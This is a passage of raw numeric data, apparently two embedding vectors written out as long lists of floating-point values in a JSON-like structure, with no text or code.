010024475,-0.00984697,0.0049429582,-0.012210464,-0.061000355,-0.00010604138,-0.012944071,0.056942523,-0.052496493,-0.0009461044,0.017891165,-0.04922017,-0.03133424,0.024112025,-0.023967369,0.036369644,-0.0040435228,0.009928324,0.11591765,0.009663687,0.05522857,-0.0071674394,-0.01003536,0.025198232,0.005373781,0.024461104,-0.00817201,-0.070996486,0.01505281,0.014633092,0.033857193,-0.05347687,0.042636707,0.03968612,0.024362765,0.048040416,0.010696786,-0.02809523,-0.02008688,0.03842801,-0.02039678,-0.0106512895,0.029114878,0.0015797477,0.053413868,-0.05727047,-0.031596567,0.025106328,0.04187886,0.02428033,-0.029174175,-0.035171337,0.016111325,0.041368157,-0.013890258,-0.03626774,0.018353688,0.059518117,-0.011947903,0.016129296,-0.039316554,-0.002107647,0.04988506,-0.027245708,0.003283377,0.026324566,0.047305044,-0.028758667,0.010532759,-0.01776759,-0.0077687455,0.026608037,-0.023454137,0.037765842,-0.013716699,0.009600848,0.0015843962,0.05323907,-0.002720655,0.017509744,-0.006756651,-0.019778593,0.048347726,0.049989175,-0.021011103,0.014717985,0.0052485787,-0.026742363,-0.02146074,0.013297886,0.026955282,-0.03694027,0.0012287202,-0.0564443,-0.0034591444,-0.011694819,0.023319615,0.050240062,-0.10835296,0.030283839,0.036549162,0.011463493,-0.008904084,0.013632151,0.0013577605,0.0074379663,-0.008138647,-0.0028731152,-0.027456274,-0.014550339,0.043481745,0.019577438,-0.027829746,0.02995253,0.0462928,0.00095222297,0.02707372,-0.08002861,-0.07101298,-0.009502251,0.001184955,0.0018425466,-0.0150206275,-0.06196117,-0.034151375,0.044757176,-0.0024459516,0.06326352,-0.014417177,0.0025038107,-0.0137323765,0.024858363,0.020560706,0.034275673,0.022358641,-0.025428398,0.009903945,-0.018632768,0.014126803,0.023612093,0.0038599211,0.010893808,0.009093307,-0.003111438,0.09484999,0.039597582,-0.07332718,-0.006497954,0.067238525,0.05163659,-0.005424062,0.018554138,-0.0031030371,0.033706147,0.03034565,0.008762964,0.0066682375,0.0063533494,-0.01742986,-0.086298645,-0.037540164,-0.010329082,0.105365254,0.0879596,-0.03284286,-0.003949085,0.03551348,-0.029197516,0.003994651,0.024447752,0.002627869,0.11264138,-0.011472879,-0.0058524185,-0.016449304,0.03314988,-0.005560832,0.019232808,0.045440026,-0.091004536,0.018758709,0.0026474204,0.06704991,-0.0059726564,-0.005752811,0.03426198,0.03267555,-0.045623053,-0.03408477,0.031298503,-0.049850978,0.037901457,0.025500527,0.029630926,-0.012492542,-0.048052076,0.033714924,-0.008949083,-0.010877498,-0.025761697,-0.03682013,-0.020534897,0.023608416,0.017702844,-0.032608163,0.031345874,-0.016230714,0.0072816694,-0.0138919735,-0.013792005,0.012818735,-0.01164455,-0.04879262,-0.03502312,0.014613887,0.017846001,-0.030775622,0.054898582,0.059637062,-0.020500023,0.021525096,0.05009724,-0.008238745,0.008581136,-0.022809008,-0.04775914,-0.020019742,0.030109566,-0.013647914,0.00084714545,0.010681169,0.07037806,-0.050569523,0.010799893,-0.026594913,-0.09778928,-0.005365188,0.0014388957,-0.015049471,0.005277929,-0.02815941,0.021045526,0.021839272,-0.02965171,-0.03211728,0.021987336,-0.028098032,-0.009589727,-0.026730131,-0.04314762,-0.0004954411,0.04014111,-0.03770642,-0.009559888,-0.004399118,0.0257637,-0.0052075195,-0.006606122,-0.0036427048,0.013095752,-0.012588123,-0.026824225,-0.030412909,0.009574771,0.03432368,-0.035802074,-0.027968405,0.052901894,-0.051457997,-0.017083889,-0.030592132,-0.0339524,-0.019314434,0.016537236,0.02371349,-0.0262541,-0.062667675,-0.027392425,-0.016391803,0.046482302,0.029465143,-0.040416908,-0.048328683,-0.025768375,-0.011332218,0.015759084,0.061866093,-0.030435707,-0.058263008,-0.033615876,0.018192166,0.0012443786,0.012520639,0.007248659,-0.0052444837,-0.08241067,-0.029356232,0.0107331015,-0.0399104,0.023497498,0.03286148,-0.032203935,0.018252915,-0.046019502,-0.07061216,0.04523064,0.0070325304,-0.051191755,0.00897411,0.04091243,0.013481554,-0.01074998,0.04034772,-0.0037578193,-0.0012097821,-0.020334773,-0.03925035,-0.00420593,0.013755369,0.048645847,-0.0030248878,0.002243129,0.057031143,-0.009193213,0.02811947,0.001510092,-0.022258347,0.040008117,0.025279295,-0.014623608,-0.009940896,0.02348775,-0.047539957,0.022890942,-0.018054316,-0.03524614,-0.016979428,-0.03173121,-0.029484091,0.030176679,-0.02840776,0.013706884,0.002093535,-0.015057011,-0.05598684,-0.024801154,0.027664922,-0.035551056,0.0066086925,-0.07578767,-0.06575585,-0.07682936,0.02048624,-0.021547908,0.04308907,0.02455348,0.020422185,0.05523861,-0.017137282,-0.033734284,0.00952465,0.03897622,-0.017368495,0.018562088,0.034532044,0.03310677,0.002865021,0.09478187,0.046258453,0.012814548,-0.0049874787,0.046080176,0.0072430796,0.016869614,-0.03699705,-0.04865116,-0.02160892,0.0024727338,0.036121838,0.024863321,-0.04224442,0.039785832,0.028308451,0.0034587863,-0.019784898,-0.074574925,-0.053439286,0.018015416,0.01677215,-0.0078430185,-0.0061475663,0.016250214,0.009635393,0.10418466,0.016386874,-0.017284391,-0.012309877,0.0198935,-0.046103496,0.064861625,-0.052069012,0.03665023,-0.06851896,0.0026924096,0.0027253306,-0.047799453,-0.038252495,-0.0015919015,-0.02239924,0.01469383,-0.041160308,-0.0091960495,0.01728294,-0.012292156,-0.03905258,-0.056242976,0.016389174,-0.0037219713,0.030806785,0.021751478,0.019381601,0.013574356,-0.021399807,0.029999644,0.0012692291,-0.008868484,-0.02062533,-0.03029189,-0.008521412,-0.00028523023,0.080811776,0.007407026,0.030443363,0.026146265,-0.04625753,0.016668607,0.03955327,0.025611186,-0.006744443,-0.027507175,0.01243309,-0.023452763,-0.022545397,0.024453223,0.0051879548,0.050793335,-0.036260147,0.012861363,-0.04144381,-0.036261,0.029249318,-0.015215403,-0.023823194,-0.058839176,-0.023005687,-0.05729102,-0.07821308,0.0055266405,0.012876014,-0.01295194,0.023094991,-0.0030901225,0.012727863,-0.05857231,0.026680233,0.025084117,-0.039766952,0.08123247,-0.0013405987,-0.013862511,0.046643265,-0.031198224,-0.00530461,0.038325008,0.03899173,0.074155964,0.033529356,0.053096514,-0.021076508,-0.00009581838,-0.026257485,-0.031407572,-0.04070116,-0.04560204,-0.030755972],[0.009903125,0.01989405,-0.1798174,-0.08481222,0.123576045,-0.08397211,-0.017075347,0.058053724,-0.010636887,-0.0735508,0.028254814,0.020090474,0.06930961,-0.018917391,-0.043123867,-0.03650142,0.036658395,-0.07015055,-0.017176198,0.009472663,-0.012403761,-0.06516881,0.010493592,-0.03987883,0.07435513,0.0415248,0.015754133,0.004888269,-0.022107098,0.027760705,0.055253208,-0.047991227,-0.014814115,-0.029881813,-0.013769641,-0.09732757,0.016070196,0.01418378,0.0128775155,-0.0110043585,0.021027274,0.03217995,0.022179442,-0.082377955,-0.011390144,0.025688816,0.049933396,0.011197049,0.03404768,-0.068615235,-0.017108476,-0.006276645,0.031092826,-0.039976735,0.13157967,0.0041428013,-0.025162194,0.030167682,0.020492593,0.004376116,0.059611786,0.103059545,-0.061545752,0.045774702,0.053118687,-0.036864728,-0.037517287,0.048071586,0.002593971,-0.01978964,0.028454809,-0.0068333982,-0.05815597,0.017800491,-0.041520115,0.0020591368,-0.03871905,-0.0325618,-0.012608413,0.051859785,0.008147853,-0.043195404,0.08616559,0.027026586,0.0335033,-0.014294058,-0.009441902,0.022289742,0.0033864386,0.043836087,0.016984483,-0.015590174,-0.02080312,0.03733201,-0.07156069,-0.014198703,0.018525286,0.03111415,-0.042062264,0.014896941,-0.02633057,-0.022927398,-0.012584411,-0.03265235,-0.054905888,0.03857049,-0.016046701,-0.009941359,0.021566587,0.009324662,0.030787682,0.04242368,-0.02204246,0.03513579,0.048883863,-0.01770889,0.047351878,0.004705192,-0.0417245,0.085920356,-0.000048915845,-0.004012965,-0.012571416,0.09138694,-0.013165629,0.031176845,-0.055780254,0.036047675,0.030581746,-0.037100613,0.025061348,-0.0000072459184,-0.020883566,0.005867266,0.040196907,0.08256229,-0.043220032,-0.014372864,0.00007817798,-0.0056573725,0.0037371903,0.007541191,-0.012742731,-0.033783544,0.0026478518,-0.039521735,0.010705822,-0.01855483,-0.0608156,0.011143048,0.0062006004,0.026957465,-0.0038711003,-0.01381697,0.041959066,-0.032591753,0.012480822,0.0269242,-0.020120159,0.051472105,0.023696344,0.045481015,-0.048399005,0.02260342,-0.009637609,-0.042163596,0.00066571747,0.061977137,0.0069011864,0.024204513,-0.03641426,0.010229954,0.054202355,-0.04458617,0.0067187822,0.016452074,0.018203417,-0.054255478,0.04503996,-0.06457605,0.0019895826,-0.037121713,0.07029861,0.024662904,-0.049272474,-0.017501408,0.020578573,-0.078581534,0.046351746,-0.036335945,0.039702095,-0.03661732,-0.0419382,-0.027524866,-0.0012610789,-0.03480898,0.021132037,-0.027184175,0.022271795,-0.010370208,-0.027425576,0.0020718358,-0.051925197,-0.004630544,-0.055585746,0.035990536,0.008487977,0.04329571,-0.009508647,0.06431979,0.058132257,-0.006177986,0.023130514,-0.022526108,-0.01808238,-0.003676272,-0.0033640186,-0.019605376,-0.06296961,0.0065739537,0.056554332,-0.014859381,0.00035241665,0.0028466745,0.027184281,0.0031276138,-0.03391904,-0.0044090487,0.030482234,-0.022103595,-0.017918352,-0.052065387,0.052227363,0.025106719,-0.0024453108,0.03508482,-0.0034088856,0.058209963,0.014827299,0.0036662943,0.021354787,0.001224489,-0.029653449,0.010977143,-0.03810694,-0.05458442,-0.033697166,-0.010753237,0.021013983,0.04981032,-0.023092797,-0.024305895,-0.01704764,0.036562778,0.03045972,-0.09002502,-0.016679479,0.00056141766,-0.002602276,-0.00039477344,0.04776483,-0.029980445,0.016817972,-0.03697327,-0.021374695,-0.06947956,-0.060324818,0.044065934,0.0010177637,0.02545682,0.024617065,0.033729013,0.050521042,0.03393225,0.004256854,0.0053826906,0.02084097,-0.008363843,-0.03624707,0.010489997,-0.044988602,0.021772036,-0.0059037716,0.021668835,0.0032087332,0.0070502735,-0.025082799,-0.004803608,0.010176798,-0.007997272,0.053230733,-0.052607406,-0.02270998,0.029848529,-0.032014847,-0.004131959,0.09174284,-0.018697748,0.034777284,-0.0073815524,0.036347277,0.09809111,0.058378775,0.028710013,-0.0015681529,-0.015824528,0.0032230264,0.01223068,0.0021647105,0.0190556,-0.03510272,-0.017357219,-0.027361725,0.031237202,0.0035477893,0.04395488,0.035375625,-0.024285799,-0.022409784,0.00034105039,-0.021917414,-0.005427609,0.020512296,-0.025274327,-0.011004674,0.056718197,-0.020508299,0.012998359,-0.036600787,-0.0463522,0.057104234,0.030462334,0.021638801,-0.04544193,-0.022699028,0.009607134,-0.024932662,0.0019203704,-0.011066049,0.0042332774,0.012570992,-0.009840966,0.01506693,-0.043956585,0.030007688,0.031232769,-0.04342752,-0.012101619,0.023340624,0.013393103,-0.02904514,0.030567782,-0.009565828,-0.010536495,0.046282955,0.010698404,0.018552236,0.014361428,0.02340935,0.009281473,0.05003983,0.034718145,-0.0004155036,0.011178984,-0.021609396,0.051411834,0.051625095,-0.03672888,0.04931181,0.009436826,-0.010144887,0.020878788,0.028154124,0.011884283,0.002701317,0.017104292,-0.07777562,-0.0017963256,-0.016803771,0.011420654,0.019616334,-0.090250775,0.023819476,0.033413604,0.035639804,-0.0043002656,0.019577058,-0.047562227,0.0006392444,0.049292583,-0.006660152,-0.021744983,-0.021583406,-0.002995797,0.012426303,-0.041285593,-0.0027374683,0.022821287,0.006530022,0.030253045,-0.05213567,-0.056699138,0.026728867,-0.025219781,-0.009166617,-0.033412997,-0.039055333,-0.014761533,0.059043743,0.009753362,0.05396389,0.015447113,0.01901725,-0.040595997,0.0033950736,0.0036441921,0.05594222,0.023339033,-0.019754153,0.020471634,-0.010927792,0.031582337,0.037121426,0.034066234,0.009750039,0.010088205,0.038148377,0.05751324,0.07200988,-0.098083794,0.011070085,0.040436517,0.034290653,-0.023284068,-0.006755804,-0.020773893,-0.009545523,0.03816332,0.009537686,0.025951218,-0.0025338742,-0.015602559,-0.035994492,-0.010893818,0.013046327,0.093023255,0.065197766,-0.03776405,-0.06495768,0.05288128,-0.04165118,-0.004279617,-0.00089242926,-0.01566132,0.09811739,-0.044348504,-0.010218837,-0.009559646,0.0161686,0.04801047,-0.00028149143,0.06311825,-0.060393013,-0.008326855,-0.008741867,-0.00674967,-0.01282245,-0.036304083,0.044585187,0.0262729,-0.058782537,-0.029967312,0.000100676305,-0.07651607,0.04103046,0.061621197,-0.002755988,0.01301719,-0.032984994,0.042389303,-0.001331101,-0.025693735,-0.045546986,-0.05098506,-0.006975247,0.03505518,0.04274038,0.00032339373,-0.005641706,-0.0015424326,0.015706994,-0.012289225,0.03727093,-0.03235149,0.02035137,-0.03789501,0.028959969,0.02653597,0.006949661,-0.006300307,0.01641034,0.018979186,-0.026342034,0.027275383,0.006126591,-0.016553842,0.08454436,-0.059535597,-0.01789112,-0.07018486,-0.0020099643,0.007011663,0.018831993,0.010525419,0.03684217,-0.036076535,0.013082426,0.004295752,-0.045061238,-0.036217984,0.004083731,-0.0110598765,-0.0342625,0.016339824,-0.06050207,0.02729537,-0.011843059,-0.040469754,0.05614618,-0.01247695,0.006515298,-0.013743251,-0.074948944,-0.024500748,0.03285474,-0.01408553,-0.03735708,-0.0041178796,0.031146951,0.000078645826,0.03048509,0.005435757,0.019796247,-0.044830456,0.0012219351,-0.052486442,-0.0017826349,0.040139828,-0.029127302,-0.053184394,0.0155645395,-0.0637663,0.0378968,-0.034068625,0.028915908,-0.019197768,0.035108205,-0.015915146,-0.030760303,-0.05313617,-0.039079785,-0.007191011,0.0133612715,0.040160675,0.006821639,-0.058073387,-0.042350546,-0.009066794,-0.008101366,0.041195814,0.0032697897,-0.03273995,0.005960402,-0.03680798,-0.026157875,0.028318552,0.036457174,0.008736945,-0.027001884,-0.023825271,0.053398572,-0.05554653,0.01928216,0.04873776,0.0014464073,-0.007852921,-0.027687289,-0.034953944,0.043863263,-0.059118297,-0.00835755,0.034959983,0.043392114,-0.010635032,-0.01531456,0.042163238,-0.008779744,-0.018465877,-0.033426955,-0.03482093,0.024556277,0.015257683,0.0021528983,-0.02820721,-0.0050955825,0.06545474,-0.018236574,0.011057458,-0.026004015,-0.01976954,0.016878014,-0.0057930844,-0.019954653,-0.01582864,0.022707228,-0.070033215,0.039150115,-0.013980127,0.010816655,-0.010610696,0.00027133105,-0.051083438,0.06908126,-0.02307103,0.0389862,-0.028276965,-0.004427218,-0.026682554,0.0051453095,-0.0024234878,-0.07548898,0.06235521,-0.045753352,-0.036222864,-0.08676603,0.024474217,-0.024198545,0.060089447,0.03266303,0.029586894,0.036331445,-0.018274238,-0.034101456,0.0078486875,0.06418214,-0.029566353,0.045511797,0.041844316,0.06129783,-0.0110615045,0.07229541,0.058243558,-0.0034760104,-0.0032491614,0.003083227,-0.011752236,0.03918674,-0.034323137,-0.06836529,-0.082731925,-0.020276273,0.012614494,-0.019772535,-0.05679003,0.021799183,-0.027438464,-0.0019030648,0.012662553,-0.038400535,-0.0441731,0.023808712,0.0032251386,-0.007192767,-0.011771021,0.02153403,0.004162673,0.06333833,0.035163965,-0.00595735,-0.013225408,0.020362861,0.02090654,0.059562135,-0.008716679,-0.0027799883,-0.043734707,-0.021503119,-0.027569374,-0.030262534,-0.015151235,-0.022751054,-0.01719556,0.029613834,-0.008435041,-0.005551068,0.019695835,-0.017496375,-0.032925915,-0.04014927,0.008383619,-0.021592027,0.015735967,0.05474748,0.038002778,0.024776043,-0.0065012043,0.029063396,-0.011529134,-0.005360641,-0.049847964,-0.008743402,0.031333297,0.01474582,0.027869962,-0.029462893,0.007827057,0.0035839418,0.010072114,-0.02958072,0.034797445,0.02910729,-0.028397541,-0.07316172,0.017968537,0.037103973,0.011606037,0.044954143,0.009790934,0.026125152,-0.018231675,-0.02353717,0.002322091,-0.049518663,0.032307774,-0.023211213,0.025813153,-0.05255465,-0.032935806,-0.064737886,-0.022702003,0.0003438512,0.017009871,-0.022609685,-0.010644094,-0.039299425,-0.00026021944,-0.027953934,0.019478511,0.023235237,-0.024778364,0.07375375,-0.010958128,0.0318497,0.018997826,-0.035030782,-0.0057699843,-0.021606624,0.044636637,0.08046101,0.039217286,0.036640488,-0.025859496,0.008095765,-0.01267377,-0.00032775936,-0.062972866,-0.04547889,-0.009048794]]} |